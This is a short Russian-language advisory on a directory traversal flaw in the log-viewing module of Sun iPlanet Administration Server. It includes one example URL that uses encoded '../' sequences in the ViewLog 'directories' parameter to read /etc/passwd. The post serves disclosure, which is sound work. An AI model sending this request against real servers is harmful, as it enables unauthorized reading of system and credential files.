В Sun iPlanet Administration Server, в модуле просмотра
логов, обнаружена возможность обхода
каталога и просмотра произвольных файлов
на системе.

Пример:

http://192.168.192.168:5000/ admin-serv/tasks/configuration/ ViewLog?file=pa
sswd&num=5000 &str=&directories=admin-serv%2Flogs%2f..
%2f..%2f..%2f..%2f..%2f..%2fetc&id=a dmin-serv

Подписаться
Уведомить о
0 комментариев
Межтекстовые Отзывы
Посмотреть все комментарии